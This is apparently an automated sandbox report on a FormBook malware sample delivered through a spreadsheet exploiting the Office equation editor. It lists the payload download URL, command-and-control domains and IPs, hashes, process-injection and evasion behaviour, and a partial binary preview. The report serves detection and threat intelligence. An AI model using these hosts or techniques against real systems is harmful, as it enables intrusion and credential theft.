        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: !Progman
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 483690 Sample: (RFQ) No.109050.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 17 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 36 2->15         started        process3 dnsIp4 44 198.12.84.109, 49165, 80 AS-COLOCROSSINGUS United States 10->44 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 10->17         started        36 C:\Users\user\...\~$(RFQ) No.109050.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 vbc.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 aubergetoitrouge.com 144.217.61.66, 49166, 80 OVHFR Canada 23->38 40 afishin.xshoppy.shop 75.2.89.208, 49168, 80 AMAZON-02US United States 23->40 42 7 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 raserver.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        (RFQ) No.109050.xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\vbc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        7.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        boxtobookshelf.com1%VirustotalBrowse
        corpmat.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
        http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T70%Avira URL Cloudsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://treyresearch.net0%URL Reputationsafe
        http://java.sun.com0%Avira URL Cloudsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7100%Avira URL Cloudmalware
        http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T70%Avira URL Cloudsafe
        http://computername/printers/printername/.printer0%Avira URL Cloudsafe
        http://198.12.84.109/cmd/vbc.exe0%Avira URL Cloudsafe
        www.afishin.com/r48a/100%Avira URL Cloudmalware
        http://www.%s.comPA0%URL Reputationsafe
        http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T70%Avira URL Cloudsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        boxtobookshelf.com
        		34.98.99.30
        		truefalseunknown
        afishin.xshoppy.shop
        		75.2.89.208
        		truetrue
          		unknown
          corpmat.com
          		34.102.136.180
          		truefalseunknown
          aubergetoitrouge.com
          		144.217.61.66
          		truetrue
            		unknown
            www.hansel-design.com
            		unknown
            		unknowntrue
              		unknown
              www.aubergetoitrouge.com
              		unknown
              		unknowntrue
                		unknown
                www.corpmat.com
                		unknown
                		unknowntrue
                  		unknown
                  www.afishin.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.boxtobookshelf.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7false
                      • Avira URL Cloud: safe
                      		unknown
                      http://198.12.84.109/cmd/vbc.exetrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.afishin.com/r48a/true
                      • Avira URL Cloud: malware
                      		low
                      http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://investor.msn.comexplorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://treyresearch.netexplorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpfalse
                                		high
                                http://java.sun.comexplorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.day.com/dam/1.045F1FF87.emf.0.drfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAexplorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              198.12.84.109
                                              		unknownUnited States
                                              		36352AS-COLOCROSSINGUStrue
                                              34.102.136.180
                                              		corpmat.comUnited States
                                              		15169GOOGLEUSfalse
                                              34.98.99.30
                                              		boxtobookshelf.comUnited States
                                              		15169GOOGLEUSfalse
                                              144.217.61.66
                                              		aubergetoitrouge.comCanada
                                              		16276OVHFRtrue
                                              75.2.89.208
                                              		afishin.xshoppy.shopUnited States
                                              		16509AMAZON-02UStrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:483690
                                              Start date:15.09.2021
                                              Start time:11:40:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 47s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:(RFQ) No.109050.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:2
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/19@5/5
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 6.3% (good quality ratio 6%)
                                              • Quality average: 72.9%
                                              • Quality standard deviation: 26.5%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 101
                                              • Number of non-executed functions: 52
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:41:45API Interceptor64x Sleep call for process: EQNEDT32.EXE modified
                                              11:41:48API Interceptor53x Sleep call for process: vbc.exe modified
                                              11:42:12API Interceptor206x Sleep call for process: raserver.exe modified
                                              11:43:06API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              198.12.84.109ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/avs/vbc.exe
                                              PO-80722 .xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/av/vbc.exe
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/rever/vbc.exe
                                              PO 60078.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/http/vbc.exe
                                              Players profile-661735550.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/www/vbc.exe
                                              ORDER 922021.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/kews/vbc.exe
                                              Quotation request.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/wdcb/vbc.exe
                                              PO 446593.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/ping/vbc.exe
                                              RFQ 10305 .xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/pnb/vbc.exe
                                              19082021.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/hdfc/vbc.exe
                                              144.217.61.66ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • www.aubergetoitrouge.com/r48a/?-ZDhz=WvIXBnuXy4zpuni0&8pBh=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • www.aubergetoitrouge.com/r48a/?Br=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&nleTs=-Zy83VrHWfxhip

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              OVHFRORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                              • 192.99.131.252
                                              qy2t7MIRoi.exeGet hashmaliciousBrowse
                                              • 92.222.145.236
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 144.217.61.66
                                              zB34E25PZM.exeGet hashmaliciousBrowse
                                              • 87.98.185.184
                                              USD INV#1191189.xlsxGet hashmaliciousBrowse
                                              • 213.186.33.5
                                              mipsGet hashmaliciousBrowse
                                              • 54.37.203.235
                                              lEsEX3McwH.exeGet hashmaliciousBrowse
                                              • 51.254.69.209
                                              5cv9ajEWlIGet hashmaliciousBrowse
                                              • 51.79.103.19
                                              oAQ0OaThsMGet hashmaliciousBrowse
                                              • 213.251.181.247
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 144.217.61.66
                                              New_PO0056329.xlsxGet hashmaliciousBrowse
                                              • 164.132.216.38
                                              Z9GkJvygEk.exeGet hashmaliciousBrowse
                                              • 149.56.94.218
                                              RZAcKBlQo0.exeGet hashmaliciousBrowse
                                              • 51.89.143.152
                                              F1MwWrwBR7.exeGet hashmaliciousBrowse
                                              • 51.89.143.157
                                              Ernest_Skye_Mitchell.htmlGet hashmaliciousBrowse
                                              • 167.114.119.127
                                              mDkCoW1yzV.exeGet hashmaliciousBrowse
                                              • 51.89.96.41
                                              Payment voucher. pdf.................gz.exeGet hashmaliciousBrowse
                                              • 51.222.134.241
                                              5siADx4Pdz.exeGet hashmaliciousBrowse
                                              • 51.89.96.41
                                              9e5SOQ1wPzGet hashmaliciousBrowse
                                              • 139.99.135.131
                                              7LqDcyRJiNGet hashmaliciousBrowse
                                              • 139.99.135.131
                                              AS-COLOCROSSINGUS70A and 90A, quantity 20000 tons.xlsxGet hashmaliciousBrowse
                                              • 192.3.141.149
                                              Remittance_Advice_details001009142021.xlsxGet hashmaliciousBrowse
                                              • 107.173.219.122
                                              ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.143
                                              Pedido.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.190
                                              #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxGet hashmaliciousBrowse
                                              • 23.95.85.181
                                              09142021_PDF.vbsGet hashmaliciousBrowse
                                              • 23.94.82.41
                                              Swift Mt103.xlsxGet hashmaliciousBrowse
                                              • 23.95.13.175
                                              vkb.xlsxGet hashmaliciousBrowse
                                              • 192.3.13.11
                                              Transfer Swift.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.190
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109
                                              REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                              • 23.94.159.208
                                              proforma invoice.xlsxGet hashmaliciousBrowse
                                              • 192.3.141.149
                                              Swift_Mt103.xlsxGet hashmaliciousBrowse
                                              • 23.95.13.175
                                              PO-80722 .xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109
                                              MT103-Swift Copy.xlsxGet hashmaliciousBrowse
                                              • 198.46.199.203
                                              Items_quote.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.145
                                              Usd_transfer.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.145
                                              REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                              • 23.94.159.208
                                              ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
                                              • 23.95.85.181
                                              msn.xlsxGet hashmaliciousBrowse
                                              • 198.12.127.217

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://198.12.84.109/cmd/vbc.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............jM... ...`....@.. ....................................@..................................M..O....`...............................L............................................... ............... ..H............text...p-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................LM......H........?..._......o.......P...........................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\248940E8.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2791E8B4.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
